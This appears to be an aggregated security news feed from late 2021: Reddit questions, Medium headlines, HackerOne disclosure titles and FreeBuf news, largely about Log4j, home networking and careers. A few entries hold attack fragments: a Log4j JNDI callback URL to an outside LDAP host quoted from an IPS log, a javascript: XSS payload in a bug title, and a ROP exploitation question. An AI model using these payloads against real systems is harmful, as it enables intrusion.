        Discovered open port 8002/tcp on 192.168.1.11
        Discovered open port 8001/tcp on 192.168.1.11
        Discovered open port 9000/tcp on 192.168.1.11
        Completed SYN Stealth Scan at 18:37, 0.23s elapsed (1000 total ports)
        Nmap scan report for 192.168.1.11
        Host is up, received arp-response (0.0058s latency).
        Scanned at 2021-12-23 18:37:29 -03 for 0s
        Not shown: 994 closed ports
        Reason: 994 resets
        PORT     STATE SERVICE        REASON
        8001/tcp open  vcom-tunnel    syn-ack ttl 64
        8002/tcp open  teradataordbms syn-ack ttl 64
        8080/tcp open  http-proxy     syn-ack ttl 64
        9000/tcp open  cslistener     syn-ack ttl 64
        9001/tcp open  tor-orport     syn-ack ttl 64
        9080/tcp open  glrpc          syn-ack ttl 64
        MAC Address: 8C:EA:48:XX:XX:XX (Unknown)
        Read data files from: /usr/bin/../share/nmap
        Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
        Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.052KB)
    It's just a Samsung smart TV. I'm really curious (maybe even concerned!?) about the service on port 9001. What could be going on? submitted by /u/EONRaider [link] [comments]  ( 3 min )
    gSuite login: Okta and VPN, or context aware access, which one is better?
    Hi there, I'm setting up gSuite and need some advice here. Use case requirements: operations team members will have access to customer data on Google Drive, so we want to enforce those team members to only view such data via corporate VPN. Our sales team members do not have access to customer data, so we do not want them to login via VPN because that's extra friction. After researching online, I found two ways of doing this: a. Using the context aware access feature from gSuite https://support.google.com/a/answer/9275380?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en Pro: set up seems straightforward, and can configure based on teams Con: pay more per user, it's like $8 more per user to our current edition b. Set up gSuite to login with Okta via SAML, and then configure Okta log on policies to require VPN for certain users https://support.google.com/a/answer/6369487?product_name=UnuFlow&hl=en&visit_id=637758886340041076-3475162686&rd=1&src=supportwidget0&hl=en#zippy=%2Csso-usernetwork-mapping-matrix Pro: Saves money, get more familiar with SAML which seems useful? Questions for experts here about this approach: Is it easy to quickly provision which users are required to login via Okta and VPN? Anything we should be careful about? The process seems quite complicated. How much time will it take? Technically how is this different from option a? I guess gSuite does all the configuration automatically for you to save the time? Which one would you advise us to go for? Any thoughts are tremendously appreciated! submitted by /u/johnestar [link] [comments]  ( 2 min )
    Is it possible to put SSO like Okta behind VPN?
    Hi there, I'm wondering is it possible to put Okta behind VPN. If employees are not connected to company VPN, login via Okta should fail. How should I enable this? submitted by /u/johnestar [link] [comments]  ( 1 min )
    Threat Research
    I’m looking into getting into a threat research position and have a few questions: 1) average workload/what to expect 2) what certs/projects would help me get into a position like this 3) any advice from anyone in this type of role I currently do analyst/threat hunting work so I have some experience but hate my current job due to soc grind and burnout. I enjoy active defense topics like honeypots and I think a research role is better suited. MA and phishing analysis is always a fun time for me submitted by /u/blue_Kazoo82 [link] [comments]  ( 1 min )
    Home Networking
    Hello everyone, soon I will be moving out of my parents' house, and I'm interested in the topic of home networking, security and privacy. Here are my plans: for the last 4 years I've fully switched to GNU/Linux and even switched my phone OS to a privacy respecting one (GrapheneOS). I plan on having a server that will have Jellyfin on it accessed remotely via Caddy (Reverse Proxy), NextCloud as an alternative to Google Drive/Google Photos, and an OpenVPN connection to my home network and PiHole. My main concern is that I would like to build a separate gaming PC that will run Windows, also if I have friends over they would need WiFi. Is it possible to separate my home network into 3 smaller networks with separate SSIDs that won't communicate between each other (basically what I'm asking is: is it possible to have separate networks for guests and me)? I would have some IoT devices such as a smart TV, but is it possible to filter it out in ACL so that the TV only has LAN but can't connect to the internet? Since I'm moving out it will be a great learning experience to make my home network. Now I have a few questions and I hope some of you lovely people could answer them. Keep in mind I'm focused on privacy and security mostly here. Which router should I go for? Which model is the best, should I go for OpenWRT? Should I get an L3 switch? If so, what model would be the best? Is it possible to separate my home network into smaller ones that won't communicate between each other (guest, my personal and IoT LAN devices)? Well, that's all the questions I have, thank you in advance. EDIT: I forgot to add this: I would need WiFi, so that means I would need some WiFi Access Points, which models should I look for? submitted by /u/throwaway89722316 [link] [comments]  ( 1 min )
    Should I be worried about non-financial hacks when assessing my security?
    So whenever I analyse my personal security, both cyber and IRL, I always look at my finances and ask "How could a hacker steal any of my funds?", so it usually defaults to me running through my financial accounts and seeing what it would take for a hacker to hack into those accounts and steal the funds. I feel if I run through all the places where my money is and check them off, I should be good, but I wonder - are there other things I should be worried about also? What's the worst that could happen if one of my non-financial accounts is hacked into? submitted by /u/EnterShikariZzz [link] [comments]  ( 3 min )
    Just had my first cyber security interview
    Hi, I am an MIS student who just finished college. Unfortunately I have to do one year of military service; I will be 25 1/2 or 26 when I finish. There is a gap between me as an MIS student and CS students. Thankfully it wasn’t as big as I thought. The interviewer liked my Python skills and reverse skills. However, he told me I need to strengthen my networking and web skills and told me to study CompTIA A+ and CompTIA Security. Told me if I want to study malware analysis I should study architecture and OS. What the interviewer liked the most was that I am a geek and that, although it isn’t my major, I kept studying security and exploitation. Between now and the time of my service I should start studying networks, web, OS, and architecture. So a couple of questions now. 1- I have an Arduino, can I study OS and architecture from it? 2- He told me to apply again after finishing these courses, but cyber security isn’t in demand in the labor market of my country yet. So I was thinking of working remotely till then, any advice on that? I was thinking of hackthebox and ranking up to apply for jobs on there. submitted by /u/Ramseesthe4th [link] [comments]  ( 2 min )
    Currently making 60k CAD in Montreal as a cybersecurity analyst, am I underpaid ?
    Hi everyone, I'm currently working as the sole Cybersecurity Analyst for a construction company in Montreal, making 60k per year + 4% bonus. 2 years of experience in IT in general. I'm wondering if I'm currently underpaid ? And how much should I expect if I jump ship next year. Thanks. submitted by /u/gateau_a_la_creme [link] [comments]  ( 4 min )
    Why are Port 6666 (irc) and Port 8443 (https-alt) exposed on my wan interface?
    I recently got my hands on a static IP from my ISP and was playing around with nmap when I noticed that both port 6666 and 8443 are open. I never used any kind of software related to IRC. I have a laptop running Ubuntu, an Xbox and 2 iPhones on my network. I think the culprit might be my Asus router, as I checked my laptop's firewall setup without any leads. Disabling UPnP doesn’t do anything. Should I be worried? Looking up port 6666 brings up a lot of scary sounding results. submitted by /u/Echiketto [link] [comments]  ( 1 min )
  • Open

    Hook Heaps and Live Free
    submitted by /u/dmchell [link] [comments]
    BLISTER malware campaign discovered
    submitted by /u/dmchell [link] [comments]
  • Open

    Cyber Detective OSINT CTF “Life Online” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. I started with the “Life Online” challenges, which… Continue reading on Medium »  ( 4 min )
    A Journey Inside Amazon's 5-Star Reviews
    Between intermediaries and data leaks Continue reading on Medium »  ( 3 min )
    How To Hack Any Website
    [Part — 2: Content Discovery] Continue reading on Medium »  ( 3 min )
  • Open

    Wrote a tool to verify whether a simple Java webapp is vulnerable to CVE-2021-44228 given a version of Log4J, Java and possibly some mitigations.
    submitted by /u/One_Explanation_4076 [link] [comments]  ( 1 min )
    RF Bugs and their detection using Software-Defined Radio
    submitted by /u/sebazzen [link] [comments]
    Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-23 Review
    Research on Attack Attribution Based on Big Data Technology by ourren Java Code Audit 1: Maven Basics by jinxing For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Detecting NTDS.DIT Theft - ESENT Event Logs
    Merry Christmas and Happy Holidays! In this 13Cubed episode, we'll take a look at the value of ESENT Event Logs in detecting potential theft of NTDS.DIT. Episode: https://www.youtube.com/watch?v=rioVumJB0Fo Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    forensic image infected analysis
    I would like to ask: what if I got a USB with an image from someone for analysis and I found that the USB is infected? What should I do to start analyzing it (connect it to my lab (FRED), or install my tools on a VM for analysis, or what)? submitted by /u/ma7moodso7eem [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability resource center
    Watch this space for the latest news and resources from Invicti on the Log4j crisis. READ MORE  ( 2 min )
  • Open

    How I Get $1350 From IDOR Just Less 1 hours
    Assalamualaikum, wr,wb , Continue reading on Medium »  ( 2 min )
    Cross-Site Request Forgery — CSRF
    What is Cross-Site Request Forgery ? Continue reading on Medium »  ( 4 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on System Weakness »  ( 2 min )
    Information Disclosure on CodePolitan
    Hello everyone, in this opportunity i will share a brief summary of the information disclosure bug that i found on the CodePolitan… Continue reading on Medium »  ( 1 min )
    AppSec Series 0x04: Crowdsourcing Security
    More than a decade ago, Jeff Howe defined a phenomenon that has gone unnoticed for a long time: “Non professionals contribute to the… Continue reading on The Startup »  ( 6 min )
  • Open

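    FreeBuf Morning Report | China's First Set of “News Digital Collectibles” Issued; Just Dance User Data Leaked
    Xinhua News Agency is issuing China's first set of “news digital collectibles” NFTs today.  ( 1 min )
    Analysis of Recent Attack Activity Against Bangladesh by the Suspected “Donot” (肚脑虫) APT Group
    Donot (“肚脑虫”) is an APT group suspected of having a South Asian background; it mainly targets the governments and militaries of neighboring countries, including Pakistan, Bangladesh, Nepal and Sri Lanka, with cyberattacks.  ( 1 min )
    The “Unkillable” “虚灵矿工” Miner: Analysis Report on a Monero Mining Trojan
    This mining trojan appends a large number of null bytes to the end of the file, bringing its size to the hundred-MB level, in order to evade detection by antivirus software and sandboxes.  ( 1 min )
    K-12 Education Apps Pose “Serious Security Risks”
    Many applications used in K-12 education have a variety of serious security problems, including ones that may lead to student data being shared with advertising companies in an “unregulated and uncontrolled” manner.
    The Latest US Hack DHS Bug Bounty Program Now Covers log4j-Related Vulnerabilities
    In response to the recently discovered log4j vulnerability, the department is expanding the scope of the Hack DHS bug bounty program, including additional incentives, to find and patch log4j-related vulnerabilities in its systems.  ( 1 min )
    Microsoft Teams Vulnerabilities That Allow Phishing Have Remained Unfixed Since March
    Microsoft Teams is a chat-based intelligent team collaboration tool that offers instant communication features such as document sharing, voice and video conferencing in sync.  ( 1 min )
    Survey Shows That in 60% of Projects, Unpatched Software With Known Vulnerabilities Let Attackers Penetrate Further
    Data from dozens of penetration tests and security assessments shows that almost every organization can be penetrated by cyber attackers.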
  • Open

    [project]Gain Access to the Target System using Trojans
    Lab1 :Gain control over a victim machine using the njRAT RAT Trojan Continue reading on Medium »  ( 1 min )
    Beyond Long4j: A Twitter Spaces Summary
    In the latest Long4j Twitter spaces discussion, @syndrowm from the team at RandoriAttack, Laughing Mantis and MG, led a community-wide… Continue reading on Medium »  ( 2 min )
  • Open

    Logback RCE Vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-42550 Comments URL: https://news.ycombinator.com/item?id=29659429 Points: 2 # Comments: 1  ( 3 min )
  • Open

    Hello everyone, question directed at people who have experience working in this field of exploit dev/ reversing
    Do u have to be an expert in other things like web security/pen testing for example. I enjoy doing reversing and finding bugs and exploiting them(still learning) and was wondering if there are other skills that someone needs to be an expert in before landing a job in this field. I do have a lot of the basics down in web security and networking but I’ve always found those pretty boring and I never really enjoy the process as much as I do from reversing and looking for things to exploit in binaries or operating systems. A lot of the security jobs out there tend to be very vague in the job description. I’m not laser focused into getting a job in this field as I’m still a software engineer and do this as a hobby but if I ever get the opportunity I would gladly take it. submitted by /u/BetaPlantationOwner [link] [comments]  ( 1 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )
  • Open

    Cache Poisoning DoS on downloads.exodus.com
    Exodus disclosed a bug submitted by youstin: https://hackerone.com/reports/1173153 - Bounty: $2500
    Static files on HackerOne.com can be made inaccessible through Cache Poisoning attack
    HackerOne disclosed a bug submitted by youstin: https://hackerone.com/reports/1181946 - Bounty: $2500
    Cache poisoning Denial of Service affecting assets.gitlab-static.net
    GitLab disclosed a bug submitted by youstin: https://hackerone.com/reports/1160407 - Bounty: $4850
    Cache Poisoning DoS on updates.rockstargames.com
    Rockstar Games disclosed a bug submitted by youstin: https://hackerone.com/reports/1219038 - Bounty: $500
    photo-test.gb.ru ()
    Mail.ru disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1257091
    Rxss on via logout?service=javascript:alert(1)
    U.S. Dept Of Defense disclosed a bug submitted by xko2x: https://hackerone.com/reports/1406598
  • Open

    Tried making bootable Caine OS usb from rufus and balena etcher, none of them were bootable, how do you fix missing partition error?
    submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Collating a Team
    Hi, I'm curating interested parties into a voluntary investigative team using forensic architecture and Bellingcat OSINT techniques to represent data and events which occurred under the Mahamat Said Abdel Kani reign in CAR. I would like to compile a report and subsequent video detailing the key atrocities that were committed under this reign, how they were carried out, and the impact on the victims. This report will hopefully be evidenced to the ICC, but would also be for personal exhibition to all contributors. Message me if you're interested :) submitted by /u/bg0203 [link] [comments]  ( 1 min )
    How do you boot Caineos from usb
    just downloaded caine os, but caine11.0.iso does not have a boot file computer boots into black screen when booting from usb submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability: LaTeX is not affected
    Article URL: https://www.latex-project.org/news/2021/12/21/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29656288 Points: 3 # Comments: 0  ( 1 min )
    Azure App Service vulnerability exposed hundreds of source code repositories
    Article URL: https://www.wiz.io/blog/azure-app-service-source-code-leak Comments URL: https://news.ycombinator.com/item?id=29655594 Points: 4 # Comments: 0  ( 5 min )
    Apache Log4j Vulnerability Guidance
    Article URL: https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance Comments URL: https://news.ycombinator.com/item?id=29653370 Points: 1 # Comments: 0  ( 5 min )
    Bug bounty platforms handling thousands of Log4j vulnerability reports
    Article URL: https://portswigger.net/daily-swig/bug-bounty-platforms-handling-thousands-of-log4j-vulnerability-reports Comments URL: https://news.ycombinator.com/item?id=29651771 Points: 1 # Comments: 0  ( 5 min )
    Acronis Vulnerability Scan Reliability
    Is the Acronis vulnerability scan reliable? It detects that my Docker, Python, Apple Music have vulnerabilities. Comments URL: https://news.ycombinator.com/item?id=29648153 Points: 1 # Comments: 0
    Current 0-day vulnerability on FreePBX
    Article URL: https://community.freepbx.org/t/0-day-freepbx-exploit/80092 Comments URL: https://news.ycombinator.com/item?id=29646626 Points: 37 # Comments: 6  ( 6 min )
    Log4j Vulnerability (Log4Shell) Explained – For Java Developers [video]
    Article URL: https://www.youtube.com/watch?v=uyq8yxWO1ls Comments URL: https://news.ycombinator.com/item?id=29643836 Points: 3 # Comments: 0
  • Open

    Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters
    Advanced Reconnaissance and Web Application Discovery RoadMap to Find Massive Vulnerabilities. Continue reading on Medium »  ( 5 min )
    Shopify Plugin Bypass using Client-side injection thru API Implementation Vulnerability
    Hi, I am Kurt Russelle Marmol doing bug hunting for more than a year, and this is my first bug bounty write-up about my findings. Continue reading on Medium »  ( 2 min )
    Learn365 Challenge Review & Year 2021 in a Nutshell
    Learning is an essential factor irrespective of your domain, level of expertise and experience. It helps one to constantly improve their… Continue reading on Medium »  ( 3 min )
    How to be a Bug Bounty Hunter
    Hello guys, in this article I’m going to share some tips on how to become a successful bug hunter. I´m Octavian, a network engineer by day… Continue reading on Medium »
    Share and Win $BUSY!
    Steps to follow: Continue reading on BusyTechnology »
    A guide to our dApp and benefits for our users
    With the launch of our testnet and bugbounty programme, we would like to give our community a brief on our dApp and the various services… Continue reading on Medium »  ( 2 min )
    A Hacker’s Guide to Submitting Bugs on Immunefi
    Many whitehat hackers and bug bounty hunters who discover Immunefi already have some experience under their belt. They’ve often submitted… Continue reading on Immunefi »  ( 8 min )
    How I was able to bypass WAF and find the origin IP and a few sensitive files
    Hello hunters, Continue reading on Medium »  ( 1 min )
    Campaign | Announcing Parami Protocol’s Bug Bounty Program
    Parami is offering $500,000 AD3 for bug hunters! Continue reading on Medium »  ( 2 min )
  • Open

    [Buffer Overflow] Looking for help for a ROP issue
    Hello! I am currently applying (for learning purposes) the following tutorial about a ROP-based buffer overflow inside my Kali VM: https://www.dailysecurity.fr/return_oriented_programming/ However, I'm unable to reproduce the same behavior and get a shell... I'm currently debugging with Peda GDB and have seen strange things such as a SIGSEGV fault. I'm a beginner and don't feel comfortable with some points: - Is my EIP during the SIGSEGV correct? It looks like it is not in the vmmap ranges (0x7... instead of 0x8...). - Moreover, "Leak scanf" has a strange value interpreted as string "JHmp" - Why are there values in my stack between gadget_pop_ebx and /bin/bash instead of just padding+leak_system+gadget_pop_ebx+leak_binsh? - When invoking "Leak system" with "SHELL=/bin/bash", does it work with the prefix "SHELL="? Or does it need another string? - In the comments someone said he had an issue with scanf interpreting space 0x20, but after checking the address I think I'm not concerned. Just maybe "Leak scanf" having 0x0a in the address could generate an error? Could you help me to understand why it doesn't work? I have attached screenshots with values of the stack, registers, etc. to help your understanding (the GDB break is located at the RET of the vuln() function to follow the ROP chain with the overwriting of "saved eip"). Many thanks!! Update: I have updated my libc and it works fine now... Still don't understand why it didn't work before. Screenshots: https://ibb.co/VmGxwC4 https://ibb.co/SPy5jNb https://ibb.co/PmMRbf0 https://ibb.co/3vHkT9Q submitted by /u/Oni_Nephilim [link] [comments]  ( 1 min )
    How do you tolerate how buggy and trash bettercap is?
    Do you just use ettercap-ng? Do the old tools work just as well as bettercap's lame ass does? submitted by /u/master-berator [link] [comments]  ( 1 min )
    Did I find proof of major hack vector possibly? Macbook
    Hi everyone, Would like a quick opinion- suffered a 6 fig hack of multiple crypto wallets in Sept. I was checking the console of my macbook for any access events or really anything at all just in case and I saw these logs from August (~7-12 days before the hack on Sept 2nd) that look like reference to some update and looks like an iPhone is possibly involved? Not sure. The vector was likely a file on my computer (not online) holding seed phrases. I didn't update my iPhone or connect my iPhone to my macbook to update at any point during that timeframe as far as I can remember. Is it possible someone on a shared network could use an iPhone to somehow access private files and data on my macbook? Or otherwise, any idea what these console events could be regarding? I am already working with US secret service on the actual tracking of the stolen crypto funds. We were not able to find the vector of the breach of private data however. Wondering if this is info that is a clue? Imgur Thanks submitted by /u/Intel81994 [link] [comments]  ( 1 min )
    Microsoft Azure Bug Leaks Linux Source Code Repository
    A cloud security vendor, Wiz.io, discovered a four-year-old bug in the Microsoft Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node that were deployed using “Local Git”. The vulnerability, dubbed “NotLegit”, has existed since September 2017 and has probably been exploited in the wild. The issue resides in the Azure App Service: when users use the “Local Git” deployment method to deploy to the Azure App Service, the .git folder gets created in the content root, which puts their data and source code at risk of information disclosure. This behavior of Azure App Service via Local Git was known to Microsoft, and the company added a “web.config” file to the .git folder within the public directory that restricted public access. How…  ( 2 min )
    "Find My Phone" went off on my phone, but I didn't activate it??
    Is this a normal thing, or could something weird be going on? I have my own wifi with a custom password. submitted by /u/SeaCommunication11 [link] [comments]  ( 1 min )
    Network Streaming Analytics With IoT
    What are threads can identify on packet sniffer? submitted by /u/Sangeeth17 [link] [comments]
    What's the main difference in Linux and UNIX? (read post)
    I'm studying about Linux systems in University now. And I'm pretty confused if Linux and UNIX are two different entities cuz my college professor seems to use these terms interchangeably and creating all this massive chaos between these two lol. So I did some research at my own to see the difference but the results were quite confusing at first glance, so now I want yall to give me correct answer, are they both same or different???? submitted by /u/The_Intellectualist [link] [comments]  ( 4 min )
    Log4j: Is the IP in this callback URL known as a serious attacker or just a PoC?
    Imgur wont let me upload a pic, so here's the callback URL I found in an IPS log (dated Dec 11): ldap://45.130.229.168:1389/Exploit This looks a lot like just a copy-pasted log4j PoC. Or has anybody been seriously compromised by this IP? submitted by /u/e_hyde [link] [comments]  ( 1 min )
    Best way to wipe external hard drive securely on windows?
    I still need to use the drive after, so physical destruction is not an option. I need to remove the data completely so that recovery software won't be able to recover anything. I don't think just formatting the drive will be enough. I've heard of DBAN but it seems more for internal drives and I'm paranoid that I might accidentally wipe my internal drive instead. submitted by /u/snkhuong [link] [comments]  ( 3 min )
    Network Streaming Analytics With IoT
    Hello Everyone, I am requesting you to fill this survey. it will help me to archive my final year research project. this project is based on developing network streaming analytics in nearly real-time with IoT devices. link is given below. Thanks. https://docs.google.com/forms/d/e/1FAIpQLSeXVeRCn43xodLsY86RK226Nhkq3A0CVS7HLyaaPNOv1VOSeg/viewform?usp=sf_link submitted by /u/Sangeeth17 [link] [comments]
    help a newbie understand what's happening with https & SSL/TLS question.
    Hello all, I'm a little confused on https and SSL/TLS. I set up a service and Nginx reverse proxy manager. I have a domain with Cloudflare. I used letsencrypt SSL certs when adding the host to my proxy manager. In Cloudflare I'm using the full SSL/TLS encrypt setting. When I go to my service outside of my network it says not secure in the toolbar. I asked this question in another sub and was told it was okay. But I looked at Wireshark and was easily able to find my password in clear text :( What exactly is encrypted and when? The service does work over https but it also wants me to point it to the PKCS #12 file. I downloaded the certs from proxy manager and am not sure what file to actually upload. I can get help on this question in that service's sub later. Thank you for your help in advance. submitted by /u/Famous_Relative2500 [link] [comments]  ( 1 min )
    Do you speak at conferences?
    I'm curious about how people who speak at conferences got into it. I always associated them with senior level IT execs just trying to sell a product. But I learned that anyone could submit to speak. Those of you that regularly speak at conferences, I'd love to hear more about how you got into it... What year did you start speaking at conferences? What was your first presentation about? What got you into it? Why did you start? What keeps you going with being a presenter? How have your presentations evolved over time? How have you evolved as a speaker over time? What are you presenting on in recent history? Are you speaking in 2022? If yes, what event(s)? submitted by /u/gnomeparadox [link] [comments]  ( 5 min )
  • Open

    On Writing DFIR Books, pt III
    Editing and Feedback When it comes to writing books, having someone you can trust to give you honest, thoughtful, insightful feedback is a huge plus. It can do a lot to boost your confidence and help you deliver a product that you're proud of. When I first started writing books, the process of going from idea to a published book was pretty set...or so I thought, being new and naïve to the whole thing. I put together an idea for a book, and started on an outline; I did this largely because the publisher was asking for things like a "word count". Then they'd send me a questionnaire to complete regarding the potential efficacy of the book, and they'd send my responses to a panel of "experts" within the industry to provide their thoughts and insight. However, there wasn't a great deal of insight i…  ( 6 min )
  • Open

    Cross Examination: Unveiling JavaScript injection based browser fingerprint masking attempts
    submitted by /u/ziyahanalbeniz [link] [comments]
    Elastic Security disrupts new BLISTER campaign leveraging code signing certificates.
    submitted by /u/expertsnowboarder [link] [comments]
    Cloud Web Application Firewall (WAF) CyberRisk Validation Comparative Report
    submitted by /u/markcartertm [link] [comments]
    Vulnerabilities in the Abode IOTA security system (fixed as of Dec 17th 2021)
    submitted by /u/jaymzu [link] [comments]
    Microsoft Teams: 1 feature, 4 vulnerabilities
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    intuitive advanced cryptography [PDF]
    submitted by /u/netfortius [link] [comments]
    Responder and IPv6 attacks - Inject a DNS suffix on Active Directory via IPv6 DNSSL
    submitted by /u/Gallus [link] [comments]  ( 1 min )
    Why it's hard to fix the Java ecosystem
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    SecWiki News 2021-12-22 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

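    FreeBuf Morning Report | Dark web market 2easy is dumping stolen data; Joker malware downloaded 500,000 times
    Security researchers have found that a dark web marketplace named "2easy" is dumping data in large volumes, stolen from roughly 600,000 infected devices.  ( 1 min )
    Silicon Valley's new get-rich-quick job: crypto startups
    More people are drawn by the spirit of Web3, seeking the decentralization of power and decision-making.  ( 1 min )
    Livestream recap | The CIS 2021 Spring Edition session-preview livestream continues
    On the longest night of the year, the winter solstice, nearly ten thousand people tuned in to the FreeBuf livestream channel to watch the CIS 2021 Spring Edition session-preview livestream.  ( 1 min )
    What should an enterprise do when a vulnerability crisis breaks out?
    For security vulnerability incidents, the state has a detailed set of laws and regulations that require the companies concerned to "report as early as possible" and help enterprises and institutions in the affected industries "patch" promptly.
    Master Stack-migration in one article
    Master Stack-migration in one article.  ( 2 min )
    Practical skills: several common methods for troubleshooting domain name resolution failures
    DNS domain name resolution is one of the key steps in accessing a website.
    Dell BIOS update may leave computers unable to boot normally
    A BIOS update recently released by Dell is causing serious boot problems on multiple laptop and desktop models.  ( 1 min )
    Full text released: "Shanghai Action Plan for Building a Cybersecurity Industry Innovation Hub (2021-2023)"
    Overall, the Action Plan sets out 4 main goals, 3 major hubs to build, 10 construction tasks, and 7 supporting measures.
    Security knowledge graphs | Mapping a software supply chain knowledge graph to strengthen risk analysis
    The seventh installment in the highlights series on "Practicing Security Knowledge Graphs, Moving Together Toward Cognitive Intelligence" describes how knowledge graph techniques are applied to software supply chain security.  ( 1 min )
    The state of enterprise IoT/OT cybersecurity
    In 2021 there were several high-profile cyberattacks against network devices, surveillance systems, pipelines and water treatment facilities, making the need for major improvements in IoT/OT cybersecurity more evident.  ( 1 min )
    TikTok Live Studio uses OBS source code, violating the GPL
    Recently, Twitter users said that TikTok's newly launched software, TikTok Live Studio, appears to use source code from OBS (Open Broadcaster Software) without complying with the relevant open-source license terms.  ( 1 min )
    Google warns that more than 35,000 Java packages are affected by the Log4j vulnerability
    Google scanned the Maven Central Java package repository and found that 35,863 packages use Log4j library versions vulnerable to Log4Shell.  ( 1 min )
    DNS Flood attack and defense types: a review and reflections
    Focuses on explaining the attack principles and defense principles, and provides a reference on how to test.  ( 1 min )
    SIP protocol message attacks and defenses
    Attack principle: SIP (Session Initiation Protocol) is an application-layer signaling control protocol used to create, modify and release sessions with one or more participants. These sessions can be Internet multimedia conferences, IP telephony or multi  ( 1 min )
    FreeBuf Morning Report | Alibaba Cloud suspended as a partner of the MIIT cybersecurity threat information sharing platform; Morgan fined US$200 million over employees' use of encrypted apps
    There is no shortage of trouble around the world. FreeBuf Morning Report: know your security news early.  ( 1 min )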
  • Open

    Google search tips: keywords alone are not enough, use these 7 techniques to boost your search skills
    Reference: https://support.google.com/websearch/answer/2466433 Continue reading on Medium »
  • Open

    dead birds
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    large chests
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    [CVE-2021–44855] Blind Stored XSS in VisualEditor media dialog at Wikipedia
    Assalamualaikum Bug Hunter & Hi Everyone Continue reading on Medium »  ( 2 min )

  • Open

    Can you recommend any tool for packet sniffing with the ability to filter traffic by processes?
    It should be a Linux tool (Windows as a last resort). It is desirable that it has the ability to decrypt SSL, TLS. The presence of a GUI will also be a big plus. All I want is to see which processes are sending which traffic. submitted by /u/vend_igo [link] [comments]  ( 1 min )
    Security experts of Reddit: In this paper it is claimed that, for $1400, a device can be constructed that intercepts cellular data. Is this still the case?
    *LTE data specifically Short Long submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
    How do you curate the learning resources out there for cybersecurity?
    As a cybersecurity professional we always keep learning new things. The best part of the internet is that there's free and paid fees out there and there are many options. The worst part is also that there are so many options. So how do you curate if a resource (blog/lab like HackTheBox/wordlists/tools) is worth learning from? I have a huge list of resources. I've dipped my toe to see what fits but now I'm overwhelmed where to start because there are too many good resources. submitted by /u/writerlyhacker [link] [comments]  ( 1 min )
    Incident handling/response certs?
    Have mixed feelings about certifications providing any real value but we have funds for a cert and I’m hoping to find a decent one that goes over the incident response lifecycle for our SOC. SANS is a bit too pricey, curious if anyone has any they would recommend. submitted by /u/freeridevt [link] [comments]  ( 1 min )
    Will attack such as LLMNR, NBT-NS and MDNS poisoner cause any issue to internal network?
    I've seen these kind of attacks are pretty common in any internal pentest tutorial. But is this safe? Will it cause any issue to customer's network? submitted by /u/w0lfcat [link] [comments]  ( 1 min )
    What is the best way to log DNS when DoH is used?
    I don't have the ability to block DoH because of legal/politics. So what is the best way to get an idea for the DNS name? The only sources I know are: Domain names extracted from SSL certificates Autonomous System lookups combined with maybe port number Manual DNS lookups I can't break SSL with a proxy, either. I have no idea what the best way to go about this is, or if there is some other data that can be combined with all of this to make identifying the IP easier. Does anyone know of some options? submitted by /u/greyyit [link] [comments]  ( 1 min )
    Guys I recently download some photorecover apps and I'm scared that they might have stolen my photos
    Are most google play apps malicious to the extent that they steal photos and sell my privacy? I already installed them and deleted them and now I'm trembling with fear. submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    ModSecurity: Add custom error page or header to blocked requests
    Hi, Using an Nginx ingress, is it possible to add a header or present a custom error page for requests that were blocked by ModSecurity? (or is it using the Ingress settings?) submitted by /u/QuickWin1 [link] [comments]  ( 1 min )
  • Open

    [Security Advisory] Apache HTTP Server fixes multiple security vulnerabilities (CVE-20...
    Apache HTTP Server recently released a security update that fixes a server-side request forgery (SSRF) and a buffer...  ( 1 min )
  • Open

    Ansible Red Hat detector Remote Code Execution – Log4j (CVE-2021-44228)
    Article URL: https://github.com/lucab85/log4j-cve-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29643144 Points: 1 # Comments: 0  ( 3 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
